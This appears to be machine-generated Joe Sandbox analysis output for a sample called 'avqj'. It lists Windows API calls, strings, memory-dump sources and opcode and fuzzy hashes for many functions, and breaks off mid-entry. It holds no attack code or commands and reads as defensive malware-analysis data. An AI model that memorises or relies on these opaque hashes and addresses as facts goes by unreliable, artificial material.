                                              • Opcode ID: 538d7fa89270f8d4b490999ecff6b8927db8a80676b465707abb46376f750597
                                              • Instruction ID: 48cc7a222aff1709bed1dba9de91b5f11e87889a76c5d691c36b99c4254d6279
                                              • Opcode Fuzzy Hash: 538d7fa89270f8d4b490999ecff6b8927db8a80676b465707abb46376f750597
                                              • Instruction Fuzzy Hash: EE514B70A00208AFCB14CF64D9809EE7BB5FF55361F218259F965DB2A0D730AD81EF90
                                              APIs
                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00EF60DD
                                              • GetLastError.KERNEL32(?,00000000), ref: 00EF6103
                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00EF6128
                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00EF6154
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                              • String ID:
                                              • API String ID: 3321077145-0
                                              • Opcode ID: ff95c8eaead79a3b6a2b243c88723eb35297bb4ccc6e7f5b3e0d581ad25c3a8e
                                              • Instruction ID: 9baf3883752b9dda0c931985aa4d75d7fa5be834bb840da71b64c32ad4bb37d4
                                              • Opcode Fuzzy Hash: ff95c8eaead79a3b6a2b243c88723eb35297bb4ccc6e7f5b3e0d581ad25c3a8e
                                              • Instruction Fuzzy Hash: 6E413539200614DFCB10EF15C544A5ABBE2EF89324B198088E99EAB362CB35FD01DB91
                                              APIs
                                              • GetForegroundWindow.USER32 ref: 00F1204A
                                                • Part of subcall function 00EE42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EE42E6
                                                • Part of subcall function 00EE42CC: GetCurrentThreadId.KERNEL32 ref: 00EE42ED
                                                • Part of subcall function 00EE42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00EE2E43), ref: 00EE42F4
                                              • GetCaretPos.USER32(?), ref: 00F1205E
                                              • ClientToScreen.USER32(00000000,?), ref: 00F120AB
                                              • GetForegroundWindow.USER32 ref: 00F120B1
                                              Similarity
                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                              • String ID:
                                              • API String ID: 2759813231-0
                                              • Opcode ID: b69afef98e3536bfc74b373785b89d423bc251ad92e7256b1858f1eb60750c93
                                              • Instruction ID: d437d9e68bad85260698659715d16050b539dee46fcbf061daff69a117aab5cc
                                              • Opcode Fuzzy Hash: b69afef98e3536bfc74b373785b89d423bc251ad92e7256b1858f1eb60750c93
                                              • Instruction Fuzzy Hash: 78315271D00109AFC744EFA6C881CEEB7F8EF48314B50846AE519E7251D671DE45CB90
                                              APIs
                                                • Part of subcall function 00E84154: _wcslen.LIBCMT ref: 00E84159
                                              • _wcslen.LIBCMT ref: 00EEE7F7
                                              • _wcslen.LIBCMT ref: 00EEE80E
                                              • _wcslen.LIBCMT ref: 00EEE839
                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00EEE844
                                              Similarity
                                              • API ID: _wcslen$ExtentPoint32Text
                                              • String ID:
                                              • API String ID: 3763101759-0
                                              • Opcode ID: 64963c2b4e28fa4360cff1bb968fd80a9b03412ee169370943dda5046b2fdd8c
                                              • Instruction ID: c1150faf7f0322909a24d9696366769c2736b3f88185776eee9f256739954e52
                                              • Opcode Fuzzy Hash: 64963c2b4e28fa4360cff1bb968fd80a9b03412ee169370943dda5046b2fdd8c
                                              • Instruction Fuzzy Hash: 0C21EAB1D01214AFDB14DFA4C981BAEB7F4EF46364F145055E808BF385D6709D4187A1
                                              APIs
                                                • Part of subcall function 00EE960C: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00EE8199,?,000000FF,?,00EE8FE3,00000000,?,0000001C,?,?), ref: 00EE961B
                                                • Part of subcall function 00EE960C: lstrcpyW.KERNEL32(00000000,?,?,00EE8199,?,000000FF,?,00EE8FE3,00000000,?,0000001C,?,?,00000000), ref: 00EE9641
                                                • Part of subcall function 00EE960C: lstrcmpiW.KERNEL32(00000000,?,00EE8199,?,000000FF,?,00EE8FE3,00000000,?,0000001C,?,?), ref: 00EE9672
                                              • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00EE8FE3,00000000,?,0000001C,?,?,00000000), ref: 00EE81B2
                                              • lstrcpyW.KERNEL32(00000000,?,?,00EE8FE3,00000000,?,0000001C,?,?,00000000), ref: 00EE81D8
                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,00EE8FE3,00000000,?,0000001C,?,?,00000000), ref: 00EE8213
                                              Strings
                                              Similarity
                                              • API ID: lstrcmpilstrcpylstrlen
                                              • String ID: cdecl
                                              • API String ID: 4031866154-3896280584
                                              • Opcode ID: 0fc77a4939afc7bbdea68be9504962df24c32c01ffe2cf29bf8ec6309650773a
                                              • Instruction ID: 0577b0442780018c1673baaa5d5140c125c5fcf55dc5cb166e3cd2e26412da23
                                              • Opcode Fuzzy Hash: 0fc77a4939afc7bbdea68be9504962df24c32c01ffe2cf29bf8ec6309650773a
                                              • Instruction Fuzzy Hash: 42113B3A20034AABCB145F75D944EBA77F5FF99354B40A02AF906DB260EF31D801D390
                                              APIs
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00F1866A
                                              • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00F18689
                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F186A1
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00EFC10A,00000000), ref: 00F186CA
                                                • Part of subcall function 00E82441: GetWindowLongW.USER32(00000000,000000EB), ref: 00E82452
                                              Similarity
                                              • API ID: Window$Long
                                              • String ID:
                                              • API String ID: 847901565-0
                                              • Opcode ID: 1f383536d0eb5943c2e84ac9ad103fe7ad595bd4952420b5bedc86f547b35d89
                                              • Instruction ID: 3af832177729fe90cdb583587a0bf013be441373b525e424b34df98c482110cb
                                              • Opcode Fuzzy Hash: 1f383536d0eb5943c2e84ac9ad103fe7ad595bd4952420b5bedc86f547b35d89
                                              • Instruction Fuzzy Hash: DE11A2329012599FCB119F28CD04AEA3BA5BB453B1F118724F93AD72E0DB308D52EB50
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7b18fb7da3d6fd5452aa1071fc94af2832e76555eadfa1756053dd4bb9788d71
                                              • Instruction ID: 5e4eb0e9d1a307197c0e66a9809d0574522cdbfe1f77a09d66d7724d37353457
                                              • Opcode Fuzzy Hash: 7b18fb7da3d6fd5452aa1071fc94af2832e76555eadfa1756053dd4bb9788d71
                                              • Instruction Fuzzy Hash: CE01ADB220A21A7EF621267C6CC1FE7675DDF423B8F35272EF721B52D1EA608C409560
                                              APIs
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00EE22D7
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EE22E9
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EE22FF
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EE231A
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: 8ad175f386b767570a7974dc648d70a611bb05ab157023a7dd65753b068867b7
                                              • Instruction ID: 5f411ea44acedcb3a3e95addf4ac34f8307e4b1c3e741c5c47e5623431b43535
                                              • Opcode Fuzzy Hash: 8ad175f386b767570a7974dc648d70a611bb05ab157023a7dd65753b068867b7
                                              • Instruction Fuzzy Hash: 8E11053A900229FFEB119FA5CD85F9DFBB8FB08754F211095EA00B7290D671AE10DB94
                                              APIs
                                                • Part of subcall function 00E82441: GetWindowLongW.USER32(00000000,000000EB), ref: 00E82452
                                              • GetClientRect.USER32(?,?), ref: 00F1A890
                                              • GetCursorPos.USER32(?), ref: 00F1A89A
                                              • ScreenToClient.USER32(?,?), ref: 00F1A8A5
                                              • DefDlgProcW.USER32(?,00000020,?,00000000,?), ref: 00F1A8D9
                                              Similarity
                                              • API ID: Client$CursorLongProcRectScreenWindow
                                              • String ID:
                                              • API String ID: 4127811313-0
                                              • Opcode ID: 1011368b24c3d96c7bd8cb61254a512bc7190dcc2549cf16f98aba104ca6f9ec
                                              • Instruction ID: 19b5122a7a1a4c6e4a92139ba45f34739edd55260d31fff9fbf132817caea593
                                              • Opcode Fuzzy Hash: 1011368b24c3d96c7bd8cb61254a512bc7190dcc2549cf16f98aba104ca6f9ec
                                              • Instruction Fuzzy Hash: F4118532901119EFDF04EFA8C8859EE77B8FB05321F004455F912E3150D734AA82EBB2
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 00EEEA29
                                              • MessageBoxW.USER32(?,?,?,?), ref: 00EEEA5C
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00EEEA72
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00EEEA79
                                              Similarity
                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                              • String ID:
                                              • API String ID: 2880819207-0
                                              • Opcode ID: ba9a97332a1cc9790409c1a5f436b2e358afbe39cb62dc22a208a21b384b88a1
                                              • Instruction ID: 9be2efa0a56ece26d812d4ac60cb886b21053a602eb3d0e06dc2f30abe431853
                                              • Opcode Fuzzy Hash: ba9a97332a1cc9790409c1a5f436b2e358afbe39cb62dc22a208a21b384b88a1
                                              • Instruction Fuzzy Hash: 4211087690035CBBD701AFA99C09ADB7FADAB47314F00822AF929F3390D6748D0497A0
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 00F18792
                                              • ScreenToClient.USER32(?,?), ref: 00F187AA
                                              • ScreenToClient.USER32(?,?), ref: 00F187CE
                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F187E9
                                              Similarity
                                              • API ID: ClientRectScreen$InvalidateWindow
                                              • String ID:
                                              • API String ID: 357397906-0
                                              • Opcode ID: 2be7663046cb3801e2f54743dd50276f46de2a9d616d27ee3f0751b798d7cb6f
                                              • Instruction ID: c5bfc05e9c8c8b1adc010fe568c62132759afcf042b76fcdabc048917b247616
                                              • Opcode Fuzzy Hash: 2be7663046cb3801e2f54743dd50276f46de2a9d616d27ee3f0751b798d7cb6f
                                              • Instruction Fuzzy Hash: E21140B9D0020DEFDB41CFA8C884AEEBBB5FB08314F108166E915E3210D735AA559F50
                                              APIs
                                              • GetSysColor.USER32(00000008), ref: 00E8216C
                                              • SetTextColor.GDI32(?,?), ref: 00E82176
                                              • SetBkMode.GDI32(?,00000001), ref: 00E82189
                                              • GetStockObject.GDI32(00000005), ref: 00E82191
                                              Similarity
                                              • API ID: Color$ModeObjectStockText
                                              • String ID:
                                              • API String ID: 4037423528-0
                                              • Opcode ID: dabe0d22b7c8fa1bdf52e9104a31b86be7ad77d90a67aedf2945c02876dafdfb
                                              • Instruction ID: 47324066aafc941a2ab0c018cce170d75a343ce636252eae8420ddb0cc0398d9
                                              • Opcode Fuzzy Hash: dabe0d22b7c8fa1bdf52e9104a31b86be7ad77d90a67aedf2945c02876dafdfb
                                              • Instruction Fuzzy Hash: 13E09231280248BEEB215B74AC09BE87B31AB1233AF14C31DF7FE680E1C3724641AB10
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 00EDEBD6
                                              • GetDC.USER32(00000000), ref: 00EDEBE0
                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EDEC00
                                              • ReleaseDC.USER32(?), ref: 00EDEC21
                                              Similarity
                                              • API ID: CapsDesktopDeviceReleaseWindow
                                              • String ID:
                                              • API String ID: 2889604237-0
                                              • Opcode ID: a2935231639c9290c58ed5522999be3fe404280c756b422db48796dacbe6b6c4
                                              • Instruction ID: 8664ceee9334b9f8883828e0502c85a62fed3c8c8271f74336b6f86644da1d0e
                                              • Opcode Fuzzy Hash: a2935231639c9290c58ed5522999be3fe404280c756b422db48796dacbe6b6c4
                                              • Instruction Fuzzy Hash: 45E01AB0800209EFCF50AFA08808AADBBF1FB08310F12C44AE90EB7310CB385941AF00
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 00EDEBEA
                                              • GetDC.USER32(00000000), ref: 00EDEBF4
                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EDEC00
                                              • ReleaseDC.USER32(?), ref: 00EDEC21
                                              Similarity
                                              • API ID: CapsDesktopDeviceReleaseWindow
                                              • String ID:
                                              • API String ID: 2889604237-0
                                              • Opcode ID: 20b86809817e15eb989de872b3458c78ec8ea3e6be750e0f7b692ab1482e429b
                                              • Instruction ID: c17f090ddef86e2aaffc3615261102e30254cc077ddf5a21046a86679d336798
                                              • Opcode Fuzzy Hash: 20b86809817e15eb989de872b3458c78ec8ea3e6be750e0f7b692ab1482e429b
                                              • Instruction Fuzzy Hash: DCE092B5900209EFCF51AFA09908AADBBF5BB48311F16C449E95EA7354DB389A01AF10
                                              APIs
                                              • __startOneArgErrorHandling.LIBCMT ref: 00EAE69D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ErrorHandling__start
                                              • String ID: pow
                                              • API String ID: 3213639722-2276729525
                                              • Opcode ID: 7683a18a0737cd8eabf3130ade9e23ff97e1aae8b36ef6f2c7b7191e7ad4a5cf
                                              • Instruction ID: 166326d1077c4952c588c5a869f8aca0ae36c93d035dd5d6325574986ac49259
                                              • Opcode Fuzzy Hash: 7683a18a0737cd8eabf3130ade9e23ff97e1aae8b36ef6f2c7b7191e7ad4a5cf
                                              • Instruction Fuzzy Hash: 5A519C61A0A10696C711B718DF013EB3BE8AB95744F306D58F0D17A3F9EF349C86EA46
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: #
                                              • API String ID: 0-1885708031
                                              • Opcode ID: 5ef28d917740d7064a8d26d87f316c0b017d68fe08574e62c655c3c3316bcd35
                                              • Instruction ID: e835d06066d370c40ec9707af11d6a19c158d7de3e3ef1d861d1243a8fd21eb8
                                              • Opcode Fuzzy Hash: 5ef28d917740d7064a8d26d87f316c0b017d68fe08574e62c655c3c3316bcd35
                                              • Instruction Fuzzy Hash: B6511131504246DFCF25EF28D480AFA77A1EF55318F296066E8A1BB3D0DA349D43CBA1
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper_wcslen
                                              • String ID: CALLARGARRAY
                                              • API String ID: 157775604-1150593374
                                              • Opcode ID: d077a55e2288957d1ce99a9ad122f312b3bed79736410d6c332f54c13cd9f6c7
                                              • Instruction ID: b30579bee2c5dad4f5d53544328c7274fcecd4657673e2736a805dfb6f954f4b
                                              • Opcode Fuzzy Hash: d077a55e2288957d1ce99a9ad122f312b3bed79736410d6c332f54c13cd9f6c7
                                              • Instruction Fuzzy Hash: 8641C271E002199FCB04EFA9C8819EEBBF5FF59720F155069E40AE7292D7709D81EB90
                                              APIs
                                              • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00F14F7E
                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F14F93
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: '
                                              • API String ID: 3850602802-1997036262
                                              • Opcode ID: eac4da535a43377c33755f4bdaacf8f6a5640bcd3ba2f240ea9a658320b72ee5
                                              • Instruction ID: dc694ad91b0a8141e923aa6fb5a36d8c31814cb00d1a61df3724430741b84ace
                                              • Opcode Fuzzy Hash: eac4da535a43377c33755f4bdaacf8f6a5640bcd3ba2f240ea9a658320b72ee5
                                              • Instruction Fuzzy Hash: 3A311975E0130A9FDB14CFA9C880BDA7BB5FF89314F10416AE905AB391D771A982DF90
                                              APIs
                                                • Part of subcall function 00E8771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00E87759
                                                • Part of subcall function 00E8771B: GetStockObject.GDI32(00000011), ref: 00E8776D
                                                • Part of subcall function 00E8771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E87777
                                              • GetWindowRect.USER32(00000000,?), ref: 00F140D9
                                              • GetSysColor.USER32(00000012), ref: 00F140F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                              • String ID: static
                                              • API String ID: 1983116058-2160076837
                                              • Opcode ID: 31ca5fd0734e16fa2293e959015f4070b3521a199b90271c330cc23591a4a03f
                                              • Instruction ID: b792329b1c6460060f4389c77b4eaf2e2e3bd2332b33f5ac9da2b2eb4311a487
                                              • Opcode Fuzzy Hash: 31ca5fd0734e16fa2293e959015f4070b3521a199b90271c330cc23591a4a03f
                                              • Instruction Fuzzy Hash: 54113A72610209AFDB01DFA8CC45AFA7BF8FF09314F014915F955E3150E675E891EB60
                                              APIs
                                                • Part of subcall function 00E8B25F: _wcslen.LIBCMT ref: 00E8B269
                                                • Part of subcall function 00EE4536: GetClassNameW.USER32(?,?,000000FF), ref: 00EE4559
                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00EE25DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_wcslen
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 624084870-1403004172
                                              • Opcode ID: d4c15e2caa632c831e1ecbeddf2b205a8dd20b0a3d2426251a1587799afed8cf
                                              • Instruction ID: d6689834e363b707f2195f36c103eac3543923a60ed4a723bb6f604c5514840b
                                              • Opcode Fuzzy Hash: d4c15e2caa632c831e1ecbeddf2b205a8dd20b0a3d2426251a1587799afed8cf
                                              • Instruction Fuzzy Hash: 2601F57160026DABCB04FFA4CD11CFE77A8EF92310B041609A966B32D6EB30980C9751
                                              APIs
                                                • Part of subcall function 00E8B25F: _wcslen.LIBCMT ref: 00E8B269
                                                • Part of subcall function 00EE4536: GetClassNameW.USER32(?,?,000000FF), ref: 00EE4559
                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00EE24D6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_wcslen
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 624084870-1403004172
                                              • Opcode ID: f289a53ccc1eafce7d28d454b164b24ae3865c54ce46630cd608ad7efb087bc6
                                              • Instruction ID: c2dd2463137dcdfaa298470a7abf51f47ed827b8f245b373a5bda856794172f4
                                              • Opcode Fuzzy Hash: f289a53ccc1eafce7d28d454b164b24ae3865c54ce46630cd608ad7efb087bc6
                                              • Instruction Fuzzy Hash: 3201F77160014DABDB14FBA1C812EFF77EC9F51340F14201A6916B72D6EA509E0CD771
                                              APIs
                                                • Part of subcall function 00E8B25F: _wcslen.LIBCMT ref: 00E8B269
                                                • Part of subcall function 00EE4536: GetClassNameW.USER32(?,?,000000FF), ref: 00EE4559
                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00EE2558
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_wcslen
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 624084870-1403004172
                                              • Opcode ID: daea56ca59ae0dcfcd96609cdf15d3b56e2343754ed80337fa8db01dc10d395c
                                              • Instruction ID: 284c7c7b15f1f99a723f20525fbca28d98ee0137c3ef582aba83d6e0f2bae6e8
                                              • Opcode Fuzzy Hash: daea56ca59ae0dcfcd96609cdf15d3b56e2343754ed80337fa8db01dc10d395c
                                              • Instruction Fuzzy Hash: 6901F2B164018DABCB10FBA1CA12AFF77EC9B11740F14201A7906B32C2EA20DE0D9672
                                              APIs
                                                • Part of subcall function 00E8B25F: _wcslen.LIBCMT ref: 00E8B269
                                                • Part of subcall function 00EE4536: GetClassNameW.USER32(?,?,000000FF), ref: 00EE4559
                                              • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00EE2663
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_wcslen
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 624084870-1403004172
                                              • Opcode ID: 16958ae60dfe5a4f89967bfcfcbb409e22f8512f820784e3618b8918fcd56f65
                                              • Instruction ID: 5a2cc3e8b30396d829f1e976d4bf93750c914191ab432e051cfdcf23fcc038f6
                                              • Opcode Fuzzy Hash: 16958ae60dfe5a4f89967bfcfcbb409e22f8512f820784e3618b8918fcd56f65
                                              • Instruction Fuzzy Hash: 71F0F9B1A4025EAACB14FBA48C51FFF77BCEF51710F041A19B566B32D6DB60980D8250
                                              APIs
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F12CCB
                                              • PostMessageW.USER32(00000000), ref: 00F12CD2
                                                • Part of subcall function 00EEF1A7: Sleep.KERNEL32 ref: 00EEF21F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: FindMessagePostSleepWindow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 529655941-2988720461
                                              • Opcode ID: 22d5b294271f0c057bb3530d30b5f922d64506bf511c79dedf30c34f40a4e304
                                              • Instruction ID: 9a19a950e2a781f315b6d4c61110d7836251b7990b200188233db1b555597097
                                              • Opcode Fuzzy Hash: 22d5b294271f0c057bb3530d30b5f922d64506bf511c79dedf30c34f40a4e304
                                              • Instruction Fuzzy Hash: 1FD022313C13487BF228B370DC0FFC67A60AB40B00F810811B305AA0C0CAE0A800D688
                                              APIs
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F12C8B
                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F12C9E
